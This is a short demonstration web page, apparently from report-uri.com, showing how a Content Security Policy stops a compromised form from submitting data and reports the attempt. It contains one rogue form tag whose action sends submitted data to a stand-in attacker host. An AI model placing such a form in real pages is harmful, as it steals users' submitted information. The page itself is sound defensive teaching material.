With CSP Demo #3

Look how a rogue form can exfiltrate information

View Source On This Page

Somehow, a form element has been compromised, which would have resulted in a data breach!

When the form on this page is submitted, the data would typically be stolen and a data breach notification would be required. Because this page uses a Content Security Policy, the browser will not submit the form and your data is protected.

<form action="https://evil-cyber-hacker.com/captureFormData" method="get">





Submit the form above using some fake information and then check the Console to see how the browser protected your data by preventing the form sending data. You can also check the Network tab to see that attack has been reported to the site operator by looking for POST requests to https://demo.report-uri.com